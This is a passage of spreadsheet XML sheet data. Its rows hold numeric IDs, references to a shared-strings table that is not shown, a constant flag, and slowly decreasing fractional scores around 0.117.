    <row r="12254" ht="15.75" customHeight="1">
      <c r="A12254" s="1">
        <v>10758.0</v>
      </c>
      <c r="B12254" s="2">
        <v>1.5509227E7</v>
      </c>
      <c r="C12254" s="2" t="s">
        <v>11772</v>
      </c>
      <c r="D12254" s="2">
        <v>1.0</v>
      </c>
      <c r="E12254" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12254" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="12255" ht="15.75" customHeight="1">
      <c r="A12255" s="1">
        <v>16572.0</v>
      </c>
      <c r="B12255" s="2">
        <v>4.6892346E7</v>
      </c>
      <c r="C12255" s="2" t="s">
        <v>11773</v>
      </c>
      <c r="D12255" s="2">
        <v>1.0</v>
      </c>
      <c r="E12255" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12255" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="12256" ht="15.75" customHeight="1">
      <c r="A12256" s="1">
        <v>2865.0</v>
      </c>
      <c r="B12256" s="2">
        <v>3.5551866E7</v>
      </c>
      <c r="C12256" s="2" t="s">
        <v>11774</v>
      </c>
      <c r="D12256" s="2">
        <v>1.0</v>
      </c>
      <c r="E12256" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12256" s="2">
        <v>0.1180555555555555</v>
      </c>
    </row>
    <row r="12257" ht="15.75" customHeight="1">
      <c r="A12257" s="1">
        <v>8915.0</v>
      </c>
      <c r="B12257" s="2">
        <v>5.4814632E7</v>
      </c>
      <c r="C12257" s="2" t="s">
        <v>11775</v>
      </c>
      <c r="D12257" s="2">
        <v>1.0</v>
      </c>
      <c r="E12257" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12257" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="12258" ht="15.75" customHeight="1">
      <c r="A12258" s="1">
        <v>13509.0</v>
      </c>
      <c r="B12258" s="2">
        <v>3.5456423E7</v>
      </c>
      <c r="C12258" s="2" t="s">
        <v>11776</v>
      </c>
      <c r="D12258" s="2">
        <v>1.0</v>
      </c>
      <c r="E12258" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12258" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="12259" ht="15.75" customHeight="1">
      <c r="A12259" s="1">
        <v>14198.0</v>
      </c>
      <c r="B12259" s="2">
        <v>3.8224315E7</v>
      </c>
      <c r="C12259" s="2" t="s">
        <v>11777</v>
      </c>
      <c r="D12259" s="2">
        <v>1.0</v>
      </c>
      <c r="E12259" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12259" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="12260" ht="15.75" customHeight="1">
      <c r="A12260" s="1">
        <v>17166.0</v>
      </c>
      <c r="B12260" s="2">
        <v>4.8890225E7</v>
      </c>
      <c r="C12260" s="2" t="s">
        <v>11778</v>
      </c>
      <c r="D12260" s="2">
        <v>1.0</v>
      </c>
      <c r="E12260" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12260" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="12261" ht="15.75" customHeight="1">
      <c r="A12261" s="1">
        <v>22218.0</v>
      </c>
      <c r="B12261" s="2">
        <v>3.2242296E7</v>
      </c>
      <c r="C12261" s="2" t="s">
        <v>11779</v>
      </c>
      <c r="D12261" s="2">
        <v>1.0</v>
      </c>
      <c r="E12261" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12261" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="12262" ht="15.75" customHeight="1">
      <c r="A12262" s="1">
        <v>28593.0</v>
      </c>
      <c r="B12262" s="2">
        <v>2.6986119E7</v>
      </c>
      <c r="C12262" s="2" t="s">
        <v>11780</v>
      </c>
      <c r="D12262" s="2">
        <v>1.0</v>
      </c>
      <c r="E12262" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12262" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="12263" ht="15.75" customHeight="1">
      <c r="A12263" s="1">
        <v>32227.0</v>
      </c>
      <c r="B12263" s="2">
        <v>5491457.0</v>
      </c>
      <c r="C12263" s="2" t="s">
        <v>11781</v>
      </c>
      <c r="D12263" s="2">
        <v>1.0</v>
      </c>
      <c r="E12263" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12263" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="12264" ht="15.75" customHeight="1">
      <c r="A12264" s="1">
        <v>2902.0</v>
      </c>
      <c r="B12264" s="2">
        <v>3.5754485E7</v>
      </c>
      <c r="C12264" s="2" t="s">
        <v>11782</v>
      </c>
      <c r="D12264" s="2">
        <v>1.0</v>
      </c>
      <c r="E12264" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12264" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="12265" ht="15.75" customHeight="1">
      <c r="A12265" s="1">
        <v>6598.0</v>
      </c>
      <c r="B12265" s="2">
        <v>4.9012644E7</v>
      </c>
      <c r="C12265" s="2" t="s">
        <v>11783</v>
      </c>
      <c r="D12265" s="2">
        <v>1.0</v>
      </c>
      <c r="E12265" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12265" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="12266" ht="15.75" customHeight="1">
      <c r="A12266" s="1">
        <v>8639.0</v>
      </c>
      <c r="B12266" s="2">
        <v>5.4329225E7</v>
      </c>
      <c r="C12266" s="2" t="s">
        <v>11784</v>
      </c>
      <c r="D12266" s="2">
        <v>1.0</v>
      </c>
      <c r="E12266" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12266" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="12267" ht="15.75" customHeight="1">
      <c r="A12267" s="1">
        <v>24956.0</v>
      </c>
      <c r="B12267" s="2">
        <v>1.2598405E7</v>
      </c>
      <c r="C12267" s="2" t="s">
        <v>11785</v>
      </c>
      <c r="D12267" s="2">
        <v>1.0</v>
      </c>
      <c r="E12267" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12267" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="12268" ht="15.75" customHeight="1">
      <c r="A12268" s="1">
        <v>2158.0</v>
      </c>
      <c r="B12268" s="2">
        <v>3.1742245E7</v>
      </c>
      <c r="C12268" s="2" t="s">
        <v>11786</v>
      </c>
      <c r="D12268" s="2">
        <v>1.0</v>
      </c>
      <c r="E12268" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12268" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="12269" ht="15.75" customHeight="1">
      <c r="A12269" s="1">
        <v>4464.0</v>
      </c>
      <c r="B12269" s="2">
        <v>4.2460146E7</v>
      </c>
      <c r="C12269" s="2" t="s">
        <v>11787</v>
      </c>
      <c r="D12269" s="2">
        <v>1.0</v>
      </c>
      <c r="E12269" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12269" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="12270" ht="15.75" customHeight="1">
      <c r="A12270" s="1">
        <v>5938.0</v>
      </c>
      <c r="B12270" s="2">
        <v>4.7269396E7</v>
      </c>
      <c r="C12270" s="2" t="s">
        <v>11788</v>
      </c>
      <c r="D12270" s="2">
        <v>1.0</v>
      </c>
      <c r="E12270" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12270" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="12271" ht="15.75" customHeight="1">
      <c r="A12271" s="1">
        <v>17172.0</v>
      </c>
      <c r="B12271" s="2">
        <v>4.8890225E7</v>
      </c>
      <c r="C12271" s="2" t="s">
        <v>11789</v>
      </c>
      <c r="D12271" s="2">
        <v>1.0</v>
      </c>
      <c r="E12271" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12271" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="12272" ht="15.75" customHeight="1">
      <c r="A12272" s="1">
        <v>19092.0</v>
      </c>
      <c r="B12272" s="2">
        <v>5.4666831E7</v>
      </c>
      <c r="C12272" s="2" t="s">
        <v>11790</v>
      </c>
      <c r="D12272" s="2">
        <v>1.0</v>
      </c>
      <c r="E12272" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12272" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="12273" ht="15.75" customHeight="1">
      <c r="A12273" s="1">
        <v>30651.0</v>
      </c>
      <c r="B12273" s="2">
        <v>4198172.0</v>
      </c>
      <c r="C12273" s="2" t="s">
        <v>11791</v>
      </c>
      <c r="D12273" s="2">
        <v>1.0</v>
      </c>
      <c r="E12273" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12273" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="12274" ht="15.75" customHeight="1">
      <c r="A12274" s="1">
        <v>32177.0</v>
      </c>
      <c r="B12274" s="2">
        <v>5.4639758E7</v>
      </c>
      <c r="C12274" s="2" t="s">
        <v>11792</v>
      </c>
      <c r="D12274" s="2">
        <v>1.0</v>
      </c>
      <c r="E12274" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12274" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="12275" ht="15.75" customHeight="1">
      <c r="A12275" s="1">
        <v>2482.0</v>
      </c>
      <c r="B12275" s="2">
        <v>3.3856946E7</v>
      </c>
      <c r="C12275" s="2" t="s">
        <v>11793</v>
      </c>
      <c r="D12275" s="2">
        <v>1.0</v>
      </c>
      <c r="E12275" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12275" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="12276" ht="15.75" customHeight="1">
      <c r="A12276" s="1">
        <v>4720.0</v>
      </c>
      <c r="B12276" s="2">
        <v>4.3316426E7</v>
      </c>
      <c r="C12276" s="2" t="s">
        <v>11794</v>
      </c>
      <c r="D12276" s="2">
        <v>1.0</v>
      </c>
      <c r="E12276" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12276" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="12277" ht="15.75" customHeight="1">
      <c r="A12277" s="1">
        <v>5854.0</v>
      </c>
      <c r="B12277" s="2">
        <v>4.6941973E7</v>
      </c>
      <c r="C12277" s="2" t="s">
        <v>11795</v>
      </c>
      <c r="D12277" s="2">
        <v>1.0</v>
      </c>
      <c r="E12277" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12277" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="12278" ht="15.75" customHeight="1">
      <c r="A12278" s="1">
        <v>15581.0</v>
      </c>
      <c r="B12278" s="2">
        <v>4.3440893E7</v>
      </c>
      <c r="C12278" s="2" t="s">
        <v>11796</v>
      </c>
      <c r="D12278" s="2">
        <v>1.0</v>
      </c>
      <c r="E12278" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12278" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="12279" ht="15.75" customHeight="1">
      <c r="A12279" s="1">
        <v>20233.0</v>
      </c>
      <c r="B12279" s="2">
        <v>1.0822691E7</v>
      </c>
      <c r="C12279" s="2" t="s">
        <v>11797</v>
      </c>
      <c r="D12279" s="2">
        <v>1.0</v>
      </c>
      <c r="E12279" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12279" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="12280" ht="15.75" customHeight="1">
      <c r="A12280" s="1">
        <v>24407.0</v>
      </c>
      <c r="B12280" s="2">
        <v>1.082269E7</v>
      </c>
      <c r="C12280" s="2" t="s">
        <v>11797</v>
      </c>
      <c r="D12280" s="2">
        <v>1.0</v>
      </c>
      <c r="E12280" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12280" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="12281" ht="15.75" customHeight="1">
      <c r="A12281" s="1">
        <v>24917.0</v>
      </c>
      <c r="B12281" s="2">
        <v>1.2361978E7</v>
      </c>
      <c r="C12281" s="2" t="s">
        <v>11798</v>
      </c>
      <c r="D12281" s="2">
        <v>1.0</v>
      </c>
      <c r="E12281" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12281" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="12282" ht="15.75" customHeight="1">
      <c r="A12282" s="1">
        <v>1676.0</v>
      </c>
      <c r="B12282" s="2">
        <v>2.8340275E7</v>
      </c>
      <c r="C12282" s="2" t="s">
        <v>11799</v>
      </c>
      <c r="D12282" s="2">
        <v>1.0</v>
      </c>
      <c r="E12282" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12282" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12283" ht="15.75" customHeight="1">
      <c r="A12283" s="1">
        <v>2071.0</v>
      </c>
      <c r="B12283" s="2">
        <v>3.1104809E7</v>
      </c>
      <c r="C12283" s="2" t="s">
        <v>11800</v>
      </c>
      <c r="D12283" s="2">
        <v>1.0</v>
      </c>
      <c r="E12283" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12283" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12284" ht="15.75" customHeight="1">
      <c r="A12284" s="1">
        <v>3447.0</v>
      </c>
      <c r="B12284" s="2">
        <v>3.8265687E7</v>
      </c>
      <c r="C12284" s="2" t="s">
        <v>11801</v>
      </c>
      <c r="D12284" s="2">
        <v>1.0</v>
      </c>
      <c r="E12284" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12284" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12285" ht="15.75" customHeight="1">
      <c r="A12285" s="1">
        <v>3450.0</v>
      </c>
      <c r="B12285" s="2">
        <v>3.8265687E7</v>
      </c>
      <c r="C12285" s="2" t="s">
        <v>11802</v>
      </c>
      <c r="D12285" s="2">
        <v>1.0</v>
      </c>
      <c r="E12285" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12285" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12286" ht="15.75" customHeight="1">
      <c r="A12286" s="1">
        <v>4145.0</v>
      </c>
      <c r="B12286" s="2">
        <v>4.1419677E7</v>
      </c>
      <c r="C12286" s="2" t="s">
        <v>11803</v>
      </c>
      <c r="D12286" s="2">
        <v>1.0</v>
      </c>
      <c r="E12286" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12286" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12287" ht="15.75" customHeight="1">
      <c r="A12287" s="1">
        <v>4181.0</v>
      </c>
      <c r="B12287" s="2">
        <v>4.1565874E7</v>
      </c>
      <c r="C12287" s="2" t="s">
        <v>11804</v>
      </c>
      <c r="D12287" s="2">
        <v>1.0</v>
      </c>
      <c r="E12287" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12287" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12288" ht="15.75" customHeight="1">
      <c r="A12288" s="1">
        <v>6649.0</v>
      </c>
      <c r="B12288" s="2">
        <v>4.909109E7</v>
      </c>
      <c r="C12288" s="2" t="s">
        <v>11805</v>
      </c>
      <c r="D12288" s="2">
        <v>1.0</v>
      </c>
      <c r="E12288" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12288" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12289" ht="15.75" customHeight="1">
      <c r="A12289" s="1">
        <v>9335.0</v>
      </c>
      <c r="B12289" s="2">
        <v>5.5629933E7</v>
      </c>
      <c r="C12289" s="2" t="s">
        <v>11806</v>
      </c>
      <c r="D12289" s="2">
        <v>1.0</v>
      </c>
      <c r="E12289" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12289" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12290" ht="15.75" customHeight="1">
      <c r="A12290" s="1">
        <v>11037.0</v>
      </c>
      <c r="B12290" s="2">
        <v>1.8005509E7</v>
      </c>
      <c r="C12290" s="2" t="s">
        <v>11807</v>
      </c>
      <c r="D12290" s="2">
        <v>1.0</v>
      </c>
      <c r="E12290" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12290" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12291" ht="15.75" customHeight="1">
      <c r="A12291" s="1">
        <v>12875.0</v>
      </c>
      <c r="B12291" s="2">
        <v>3.1939068E7</v>
      </c>
      <c r="C12291" s="2" t="s">
        <v>11808</v>
      </c>
      <c r="D12291" s="2">
        <v>1.0</v>
      </c>
      <c r="E12291" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12291" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12292" ht="15.75" customHeight="1">
      <c r="A12292" s="1">
        <v>15291.0</v>
      </c>
      <c r="B12292" s="2">
        <v>4.2420876E7</v>
      </c>
      <c r="C12292" s="2" t="s">
        <v>11809</v>
      </c>
      <c r="D12292" s="2">
        <v>1.0</v>
      </c>
      <c r="E12292" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12292" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12293" ht="15.75" customHeight="1">
      <c r="A12293" s="1">
        <v>15927.0</v>
      </c>
      <c r="B12293" s="2">
        <v>4.4696906E7</v>
      </c>
      <c r="C12293" s="2" t="s">
        <v>11810</v>
      </c>
      <c r="D12293" s="2">
        <v>1.0</v>
      </c>
      <c r="E12293" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12293" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12294" ht="15.75" customHeight="1">
      <c r="A12294" s="1">
        <v>16048.0</v>
      </c>
      <c r="B12294" s="2">
        <v>4.5204344E7</v>
      </c>
      <c r="C12294" s="2" t="s">
        <v>11811</v>
      </c>
      <c r="D12294" s="2">
        <v>1.0</v>
      </c>
      <c r="E12294" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12294" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12295" ht="15.75" customHeight="1">
      <c r="A12295" s="1">
        <v>18066.0</v>
      </c>
      <c r="B12295" s="2">
        <v>5.1608807E7</v>
      </c>
      <c r="C12295" s="2" t="s">
        <v>11812</v>
      </c>
      <c r="D12295" s="2">
        <v>1.0</v>
      </c>
      <c r="E12295" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12295" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12296" ht="15.75" customHeight="1">
      <c r="A12296" s="1">
        <v>19192.0</v>
      </c>
      <c r="B12296" s="2">
        <v>5.4981024E7</v>
      </c>
      <c r="C12296" s="2" t="s">
        <v>11813</v>
      </c>
      <c r="D12296" s="2">
        <v>1.0</v>
      </c>
      <c r="E12296" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12296" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12297" ht="15.75" customHeight="1">
      <c r="A12297" s="1">
        <v>24061.0</v>
      </c>
      <c r="B12297" s="2">
        <v>9604430.0</v>
      </c>
      <c r="C12297" s="2" t="s">
        <v>11814</v>
      </c>
      <c r="D12297" s="2">
        <v>1.0</v>
      </c>
      <c r="E12297" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12297" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12298" ht="15.75" customHeight="1">
      <c r="A12298" s="1">
        <v>29384.0</v>
      </c>
      <c r="B12298" s="2">
        <v>3.1847944E7</v>
      </c>
      <c r="C12298" s="2" t="s">
        <v>11815</v>
      </c>
      <c r="D12298" s="2">
        <v>1.0</v>
      </c>
      <c r="E12298" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12298" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12299" ht="15.75" customHeight="1">
      <c r="A12299" s="1">
        <v>29784.0</v>
      </c>
      <c r="B12299" s="2">
        <v>3.5022539E7</v>
      </c>
      <c r="C12299" s="2" t="s">
        <v>11816</v>
      </c>
      <c r="D12299" s="2">
        <v>1.0</v>
      </c>
      <c r="E12299" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12299" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12300" ht="15.75" customHeight="1">
      <c r="A12300" s="1">
        <v>30072.0</v>
      </c>
      <c r="B12300" s="2">
        <v>3625318.0</v>
      </c>
      <c r="C12300" s="2" t="s">
        <v>11817</v>
      </c>
      <c r="D12300" s="2">
        <v>1.0</v>
      </c>
      <c r="E12300" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12300" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12301" ht="15.75" customHeight="1">
      <c r="A12301" s="1">
        <v>30880.0</v>
      </c>
      <c r="B12301" s="2">
        <v>4636273.0</v>
      </c>
      <c r="C12301" s="2" t="s">
        <v>11818</v>
      </c>
      <c r="D12301" s="2">
        <v>1.0</v>
      </c>
      <c r="E12301" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12301" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12302" ht="15.75" customHeight="1">
      <c r="A12302" s="1">
        <v>33329.0</v>
      </c>
      <c r="B12302" s="2">
        <v>7562023.0</v>
      </c>
      <c r="C12302" s="2" t="s">
        <v>11819</v>
      </c>
      <c r="D12302" s="2">
        <v>1.0</v>
      </c>
      <c r="E12302" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12302" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="12303" ht="15.75" customHeight="1">
      <c r="A12303" s="1">
        <v>4352.0</v>
      </c>
      <c r="B12303" s="2">
        <v>4.2085604E7</v>
      </c>
      <c r="C12303" s="2" t="s">
        <v>11820</v>
      </c>
      <c r="D12303" s="2">
        <v>1.0</v>
      </c>
      <c r="E12303" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12303" s="2">
        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="12304" ht="15.75" customHeight="1">
      <c r="A12304" s="1">
        <v>19311.0</v>
      </c>
      <c r="B12304" s="2">
        <v>5.5285853E7</v>
      </c>
      <c r="C12304" s="2" t="s">
        <v>11821</v>
      </c>
      <c r="D12304" s="2">
        <v>1.0</v>
      </c>
      <c r="E12304" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12304" s="2">
        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="12305" ht="15.75" customHeight="1">
      <c r="A12305" s="1">
        <v>24306.0</v>
      </c>
      <c r="B12305" s="2">
        <v>1.0580678E7</v>
      </c>
      <c r="C12305" s="2" t="s">
        <v>11822</v>
      </c>
      <c r="D12305" s="2">
        <v>1.0</v>
      </c>
      <c r="E12305" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12305" s="2">
        <v>0.1170940170940171</v>
      </c>
    </row>
    <row r="12306" ht="15.75" customHeight="1">
      <c r="A12306" s="1">
        <v>33472.0</v>
      </c>
      <c r="B12306" s="2">
        <v>7973551.0</v>
      </c>
      <c r="C12306" s="2" t="s">
        <v>11823</v>
      </c>
      <c r="D12306" s="2">
        <v>1.0</v>
      </c>
      <c r="E12306" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12306" s="2">
        <v>0.117003367003367</v>
      </c>
    </row>
    <row r="12307" ht="15.75" customHeight="1">
      <c r="A12307" s="1">
        <v>6406.0</v>
      </c>
      <c r="B12307" s="2">
        <v>4.8491033E7</v>
      </c>
      <c r="C12307" s="2" t="s">
        <v>11824</v>
      </c>
      <c r="D12307" s="2">
        <v>1.0</v>
      </c>
      <c r="E12307" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12307" s="2">
        <v>0.1166666666666667</v>
      </c>
    </row>
    <row r="12308" ht="15.75" customHeight="1">
      <c r="A12308" s="1">
        <v>25249.0</v>
      </c>
      <c r="B12308" s="2">
        <v>1.3382049E7</v>
      </c>
      <c r="C12308" s="2" t="s">
        <v>11825</v>
      </c>
      <c r="D12308" s="2">
        <v>1.0</v>
      </c>
      <c r="E12308" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12308" s="2">
        <v>0.1166666666666667</v>
      </c>
    </row>
    <row r="12309" ht="15.75" customHeight="1">
      <c r="A12309" s="1">
        <v>28227.0</v>
      </c>
      <c r="B12309" s="2">
        <v>2.5133129E7</v>
      </c>
      <c r="C12309" s="2" t="s">
        <v>11826</v>
      </c>
      <c r="D12309" s="2">
        <v>1.0</v>
      </c>
      <c r="E12309" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12309" s="2">
        <v>0.1166666666666667</v>
      </c>
    </row>
    <row r="12310" ht="15.75" customHeight="1">
      <c r="A12310" s="1">
        <v>4543.0</v>
      </c>
      <c r="B12310" s="2">
        <v>4.2659056E7</v>
      </c>
      <c r="C12310" s="2" t="s">
        <v>11827</v>
      </c>
      <c r="D12310" s="2">
        <v>1.0</v>
      </c>
      <c r="E12310" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12310" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="12311" ht="15.75" customHeight="1">
      <c r="A12311" s="1">
        <v>8114.0</v>
      </c>
      <c r="B12311" s="2">
        <v>5.3073521E7</v>
      </c>
      <c r="C12311" s="2" t="s">
        <v>11828</v>
      </c>
      <c r="D12311" s="2">
        <v>1.0</v>
      </c>
      <c r="E12311" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12311" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="12312" ht="15.75" customHeight="1">
      <c r="A12312" s="1">
        <v>10177.0</v>
      </c>
      <c r="B12312" s="2">
        <v>5.7385089E7</v>
      </c>
      <c r="C12312" s="2" t="s">
        <v>11829</v>
      </c>
      <c r="D12312" s="2">
        <v>1.0</v>
      </c>
      <c r="E12312" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12312" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="12313" ht="15.75" customHeight="1">
      <c r="A12313" s="1">
        <v>14639.0</v>
      </c>
      <c r="B12313" s="2">
        <v>4.0353612E7</v>
      </c>
      <c r="C12313" s="2" t="s">
        <v>11830</v>
      </c>
      <c r="D12313" s="2">
        <v>1.0</v>
      </c>
      <c r="E12313" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12313" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="12314" ht="15.75" customHeight="1">
      <c r="A12314" s="1">
        <v>17160.0</v>
      </c>
      <c r="B12314" s="2">
        <v>4.8890225E7</v>
      </c>
      <c r="C12314" s="2" t="s">
        <v>11831</v>
      </c>
      <c r="D12314" s="2">
        <v>1.0</v>
      </c>
      <c r="E12314" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12314" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="12315" ht="15.75" customHeight="1">
      <c r="A12315" s="1">
        <v>222.0</v>
      </c>
      <c r="B12315" s="2">
        <v>1.4664511E7</v>
      </c>
      <c r="C12315" s="2" t="s">
        <v>11832</v>
      </c>
      <c r="D12315" s="2">
        <v>1.0</v>
      </c>
      <c r="E12315" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12315" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12316" ht="15.75" customHeight="1">
      <c r="A12316" s="1">
        <v>473.0</v>
      </c>
      <c r="B12316" s="2">
        <v>1.7409052E7</v>
      </c>
      <c r="C12316" s="2" t="s">
        <v>11833</v>
      </c>
      <c r="D12316" s="2">
        <v>1.0</v>
      </c>
      <c r="E12316" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12316" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12317" ht="15.75" customHeight="1">
      <c r="A12317" s="1">
        <v>1454.0</v>
      </c>
      <c r="B12317" s="2">
        <v>2.6865422E7</v>
      </c>
      <c r="C12317" s="2" t="s">
        <v>11834</v>
      </c>
      <c r="D12317" s="2">
        <v>1.0</v>
      </c>
      <c r="E12317" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12317" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12318" ht="15.75" customHeight="1">
      <c r="A12318" s="1">
        <v>1666.0</v>
      </c>
      <c r="B12318" s="2">
        <v>2.8205035E7</v>
      </c>
      <c r="C12318" s="2" t="s">
        <v>11835</v>
      </c>
      <c r="D12318" s="2">
        <v>1.0</v>
      </c>
      <c r="E12318" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12318" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12319" ht="15.75" customHeight="1">
      <c r="A12319" s="1">
        <v>1999.0</v>
      </c>
      <c r="B12319" s="2">
        <v>3.0586884E7</v>
      </c>
      <c r="C12319" s="2" t="s">
        <v>11836</v>
      </c>
      <c r="D12319" s="2">
        <v>1.0</v>
      </c>
      <c r="E12319" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12319" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12320" ht="15.75" customHeight="1">
      <c r="A12320" s="1">
        <v>2349.0</v>
      </c>
      <c r="B12320" s="2">
        <v>3.3076198E7</v>
      </c>
      <c r="C12320" s="2" t="s">
        <v>11837</v>
      </c>
      <c r="D12320" s="2">
        <v>1.0</v>
      </c>
      <c r="E12320" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12320" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
